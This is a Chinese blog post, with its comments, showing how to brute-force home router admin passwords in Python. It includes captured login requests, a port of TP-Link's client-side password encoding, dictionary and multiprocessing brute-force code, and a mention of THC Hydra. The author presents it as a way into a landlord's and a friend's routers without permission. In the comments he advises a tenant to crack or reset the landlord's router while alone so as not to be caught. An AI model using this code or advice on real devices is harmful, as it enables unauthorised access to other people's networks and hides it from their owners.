登录
  • 人们都希望被别人需要 却往往事与愿违
  • 投资成功与否并非取决于你了解的东西, 而在于你能否老老实实地承认你所不知道的东西。投资人并不需要做对很多事情, 重要的是不要犯重大的错误@巴菲特

使用python暴力破解路由器管理密码

畅言 Benny小土豆 24807次浏览 4906字 38个评论
文章目录[显示]
这篇文章在 2018年05月21日16:22:00 更新了哦~

警告:此文可能存在一些破坏性或违反当地法律法规的内容,还可能会玩脱,仅供学习参考,请各位自行斟酌。
另外,如果能够物理接触到路由器,直接抓PPPoE拨号密码就好了

自从实习以来,我一直苦恼于一个问题:桥接的房东家路由器,但是一直不知道路由器的管理密码。其实这也不算啥,不知道就不知道呗。直到某一天去某童鞋家,但是就是连不上Wi-Fi,看着挂在墙上的路由器,我就起了邪念……插网线,拿MR12U桥接。但是啊但是啊……咱是不是要进管理里看一下WPA2-PSK究竟是什么!

我目前只遇到了两种类型的路由器,咱就先来爽一把。

工欲善其事,必先利其器。那我们自然要有wireshark,还有postman啊,当然了,没有python解释器也是不行的,啊对你还得有个路由器ε=ε=ε=┏(゜ロ゜;)┛但是你要是真没有路由器,那就拿Flask写一个简单的REST API吧,也是可以的(但是这还有什么用呢)。

其实在写这篇文章之前,我是很尴尬的……

使用python暴力破解路由器管理密码

推特小剧场

路由器管理页面登录方式

我目前见过两种,还有一种就是像openwrt那种……暂时没有环境测试,不玩。

传统型

大概是这样,需要你输入用户名密码:

使用python暴力破解路由器管理密码

新型

使用python暴力破解路由器管理密码

我当然是喜欢传统型的啊,为啥,多了个用户名,猜不中用户名有啥用嘛,哈哈哈哈。

抓包之旅:传统型

所以嘛,什么都不用想,打开wireshark抓包,然后追踪HTTP流,能得到如下的请求报文:

GET / HTTP/1.1
Host: 192.168.7.1
Connection: keep-alive
Authorization: Basic xxxxx
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3075.92 Safari/537.36 OPR/46.0.2218.234
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: shellInABox=3:101010

所以咱们大概是懂了,发现这家伙是登录是get请求带个Authorization的头,内容是Basic base64编码的信息,其中base64编码的是用户名:密码,那咱抄起postman就开始……

使用python暴力破解路由器管理密码

既然用postman已经成功登录了,那就没太大问题。

抓包之旅:新型

这个866N嘛,首先管理页面右键没有用,开控制台发现是JS渲染的,再一看发现不是传统的表单提交的,估计是用的AJAX吧。抓包过滤http的post请求,大概能发现这么奇特的请求:

使用python暴力破解路由器管理密码

看这样子是点击确定按钮之后,用ajax方式提交了一个json。咱在报文上右键,追踪流-HTTP流,看一下完整的响应:

POST / HTTP/1.1
Host: 192.168.1.1
Connection: keep-alive
Content-Length: 54
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://192.168.1.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.9; rv:56.0) Gecko/20100101 Firefox/56.0
Content-Type: application/json; charset=UTF-8

DNT: 1
Referer: http://192.168.1.1/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7

{"method":"do","login":{"password":"0KcgeXhc9TefbwK"}}HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Content-Length: 75
Connection: close
Access-Control-Allow-Origin: *
Cache-control: no-cache
{"error_code":0, "stok":"%7EAjzwZP%2E%2EFD%5B0Z%7C46Z4PPP%28LQPu4%28kD%28"}

也就是说是提交了{"method":"do","login":{"password":"0KcgeXhc9TefbwK"}}这样一个json,很明显那个0K什么的就是密码了,用postman提交一下试试,咋提交呢?headers设置成application/json,然后body里写raw,设置json,不出意外的话,你会得到一个error code 0

使用python暴力破解路由器管理密码

但是吧,0KcgeXhc9TefbwK这究竟是个啥,估计是在浏览器这里用JS加密了的密码吧,那咱就看JS然后溯源……?

还好已经有人分析过了,并且给出了C#版本的代码,咱只要port到Python就好啦。

小提示:我曾经在一篇博文中讨论过究竟是客户端加密还是服务端加密,我给出的观点是,至少要进行服务端加密。因为客户端加密是完全可以被重放攻击的。就这个例子来说,假如是有人通过中间人劫持的方式抓到了这个json,那么他就可以重放这个json来登录,尽管他依旧不知道密码。当然了,你都客户端加密了,自然加密用的密钥可能会被发现,然后被逆向。

一种另类的模拟登录的办法

在正经的用requests库之前,我想到了一种另类的模拟登录的办法,比如说上面的这段JS我要是没逆向出来,那么就只好这么了,这种方法叫做……selenium

from selenium import webdriver

driver = webdriver.Chrome()
driver.get('http://192.168.1.1')
driver.find_element_by_xpath('//*[@id="lgPwd"]').send_keys('123456')
driver.find_element_by_xpath('//*[@id="loginSub"]').click()

当然了你还需要写几行代码判断是否登录成功,咱还可以把Chrome换成PhantomJS,只不过嘛,嘿嘿嘿,这个速度,估计要几秒钟才能尝试一个密码,效率太低啦。

传统路由器用Python模拟登录

既然我们已经用postman搞成功了,那么就上requests库试试吧。代码很简单,就几行,简单的测试下:

import requests
r=requests.get('http://192.168.7.1', headers={'Authorization': 'Basic QxxxxI2'})
print r.status_code

如果status_code为200的话,那么就是登录成功了。

新型路由器用Python模拟登录

不要害怕,我已经帮你逆向好了客户端加密的那段代码,所以总体来说大概就是这么两个函数(好吧感觉缩进乱了):当然啦,能够把JavaScript代码移植到Python也很不容易的,这是没有混淆、比较简单易懂的那种的,要是复杂的话,直接用PyExecJS吧(可惜停止维护了)

def security_encode(b):
    a = 'RDpbLfCPsJZ7fiv'
    c = 'yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciXTysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgMLwygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3sfQ1xtXcPcf1aT303wAQhv66qzW'

    e = ''
    g = len(a)
    h = len(b)
    k = len(c)

    f = g if g > h else h
    for p in range(f):
        n = l = 187
        if p >= g:
            n = ord(b[p])
        elif p >= h:
            l = ord(a[p])
        else:
            l = ord(a[p])
            n = ord(b[p])
        e += c[((l ^ n) % k)]
    return e


def login(password):
    requests.get('http://192.168.1.1', headers={'Content-Type': 'application/json'})
    r = requests.post('http://192.168.1.1', json={"method": "do", "login": {"password": security_encode(password)}})
    return r.status_code

同上,status_code为200,就意味着密码正确啦。

开始暴力破解:集成弱口令字典

当然了,实际暴力破解的时候,咱不可能一个一个输入密码,所以咱要使用弱口令字典。为了演示方便,我就随意编辑了一个比较简单的、长度比较短的弱口令字典,咱封装一下就好啦。想要真正的弱口令字典吗?自己搜索去吧~

def new_crack():
    with open('test_pass.txt', 'r') as f:
        while True:
            line = f.readline()
            if len(line) == 0:
                break
            else:
                result, msg = new_login(line.rstrip('\n'))
                if result:
                    return msg

至于传统登录的,还需要一份用户名文件,双重循环并注意seek即可。

封装,封装

在完成了基本的测试之后,基本上就剩下封装函数、引入库、进行测试这些基本操作了,详细的代码就不贴了,可以戳下面的章鱼猫获取。其实这代码还可以更灵活的,那么就交给读者们了!
项目地址

加快破解速度

俗话说,欲速则不达,呸,我才不管这些呢。我要加快破解程序的破解速度,我这一跑,也就占用20%不到的CPU,速度太慢了。那么……多线程?呃,Python里的多线程由于GIL锁的存在,这多线程有时接近个摆设(就是说,无法发挥多核CPU的全部性能,当然如果不是CPU密集型的任务,遇到I/O操作会释放锁,用多线程还是可以并发的)……那么我们只能上多进程了…省事,跑满CPU…另外,评论区仙子指出,连接复用也是一个好办法。

 

那我们只需要在密码那里开个进程池,把任务全都丢给进程池,然后一起join就可以了。详细的代码可以参考下面的章鱼猫。
多进程示例地址

当然了,为了防止反复调用p.get()影响多进程效率,我稍微做了一点点改动。

使用python暴力破解路由器管理密码

这是一颗满载的CPU……

最后的结果……

使用python暴力破解路由器管理密码

我还能说什么,TP-LINK这绝对是脑子进水了。客户端加密的时候我就说你有毛病了,这连自己都进不去管理页面逼我重启路由器,真是……行吧,我打算逆向固件了。下次见。啊对,有个工具叫THC Hydra,也可以试试哦!

哦对了

提前祝愿小伙伴们元旦快乐!


文章版权归原作者所有丨本站默认采用CC-BY-NC-SA 4.0协议进行授权|
转载必须包含本声明,并以超链接形式注明原作者和本文原始地址:
https://dmesg.app/python-bfa-router.html
喜欢 (17)
分享:-)
关于作者:
If you have any further questions, feel free to contact me in English or Chinese.
发表我的评论
取消评论

                     

去你妹的实名制!

  • 昵称 (必填)
  • 邮箱 (必填,不要邮件提醒可以随便写)
  • 网址 (选填)
(38)个小伙伴在吐槽
  1. 我输了123456也进去了,他妈的无语
    2019-11-19 22:57 回复
    • 别无语了,你这是超级走运
      Benny小土豆2019-11-20 17:53 回复
  2. 大佬,我也是租客也不知到管理员密码,很想进去解除限速(房东说解除要给钱),奈何大佬的文章努力过到确实没有基础一点都看不懂,希望大佬能抬一手帮帮忙
    孤独的租客2019-09-13 03:00 回复
    • 大佬求回复
      孤独的租客2019-09-13 21:25 回复
    • 希望大佬可以帮忙有偿协助
      孤独的租客2019-09-13 21:28 回复
    • 1. 尝试暴力破解 2. 找路由器固件的漏洞 3. 抓PPPoE密码,然后重置路由器,建议在只有自己的时候做,避免被发现
      Benny小土豆2019-09-14 09:21 回复
  3. **感谢感谢**,终于打开了,大佬牛逼
    ZL2019-06-26 09:10 回复
  4. benny,我可以物理接触路由器,请问pppoe拨号密码怎么抓?
    啦啦啦2019-02-13 21:27 回复
    • 这里 https://www.rcsugus.com/2017/05/28/capture-ppp-pap-package-using-pypcap-and-dpkg/ 这里 https://www.zhangguangtong.cn/?p=97
      主要就是配置pppoe服务器,然后wireshark抓就可以了
      Benny小土豆2019-02-14 11:05 回复
      • 大佬,这个网址打不开啊
        Sean2019-03-29 22:02 回复
  5. 是不是就破解不了了?办公室网络被人恶意限速,不知道宽带密码,所以只能想这种法子了。
    idiotday2018-03-25 08:21 回复
    • 如果是PPPoE的话,是有办法拿到拨号密码的。
      Benny小土豆2018-03-25 08:41 回复
    • 只要抓一下PPPoE密码之后重置默认设置就好了
      sssa2018-04-29 23:09 回复
      • 是的,前提是你能够物理接触。
        Benny小土豆2018-04-30 08:43 回复
      • 我已经抓包到了!感谢指点!用的虚拟机加wireshark
        idiotday2018-05-12 08:45 回复
        • 不客气
          Benny小土豆2018-05-12 18:57
  6. 今天看了你好多文章,受益匪浅!
    被烧死的火柴2018-01-13 18:12 回复
    • 那就下次再来呗~~
      Benny小土豆2018-01-13 21:10 回复
  7. 哎 我好像之前评论了啊 怎么不见了。。 happy new year
    Hendricks2018-01-03 10:58 回复
    • 检查了一遍垃圾评论,并没有……
      Benny小土豆2018-01-03 11:03 回复
  8. 暴力破解不可取,密码难度真的太高了,不如万能钥匙好用了,几年前好使,现在不行了,大家密码都不在字典里的.破了WIFI,好多人的登陆密码与WIFI一样的
    一个SB2017-12-28 22:11 回复
    • 你理解有误。不是WPA2 PSK,而是管理密码
      Benny小土豆2017-12-28 22:16 回复
  9. 所以咱的路由器是ssh certificate only的( 话说TP-Link的CGI不是一大堆洞么……
    TJM2017-12-28 13:03 回复
    • 没有web页面嘛?只靠SSH连上去哇真大佬! 这漏洞估计是有的……但是 就我这水平……
      Benny小土豆2017-12-28 13:10 回复
      • Luci习惯就好…… 咱记得有的洞都进了cve了,msf里应该有poc
        TJM2017-12-28 13:12 回复
        • 确实有几个进CVE了……但是具体PoC还懒得搜索&
          Benny小土豆2017-12-28 13:25
      • 大佬求教学。。
        追梦2018-07-18 22:27 回复
    • 大佬大佬.png
      ホロ2018-01-02 23:19 回复
      • 可爱的狼狼才是大佬.webp
        Benny小土豆2018-01-02 23:26 回复
        • 大佬,不懂你这意思。。
          追梦2018-07-18 22:25
        • 能否加个微信QQ什么的呢,
          追梦2018-07-18 22:28
  10. 多线程可以加快速度的,因为瓶颈并不在 CPU 上(至少不全是)。 另外有一个非常简单的办法,通常可以提高两倍多的效率:连接复用,生成一个 requests.Session 然后用它的 get 方法取代 requests.get。 多线程可以加快速度的,因为瓶颈并不在 CPU 上(至少不全是)。 另外有一个非常简单的办法,通常可以提高两倍多的效率:连接复用,生成一个 requests.Session 然后用它的 get 方法取代 requests.get。 PS: 下边那个评论框真坑人,邮件没验证不让评论就提前说,非得等我写好提交了之后才告诉我出错了,然后我写了半天的文字就没了……然后又嫌我刚注册不让评论……不让评论你早说啊…………
    依云2017-12-28 12:45 回复
    • 唉??评论框随意写个什么邮箱就可以的啊…莫非是askimet的锅…????
      连接复用是个好办法,感谢指教!多线程嘛……??
      Benny小土豆2017-12-28 12:55 回复
    • 啊你在说下面v2mm的评论框……?
      Benny小土豆2017-12-28 13:06 回复
      • 是啊。之前没注意就用那个了……
        依云2017-12-28 13:54 回复
        • 哈哈哈 这个锅我不背……
          Benny小土豆2017-12-28 14:16
  11. 土豆来给我咬一口啦!??
    Yandere2017-12-28 12:24 回复
    • 你怎么来的这么快??☕️
      Benny小土豆2017-12-28 12:27 回复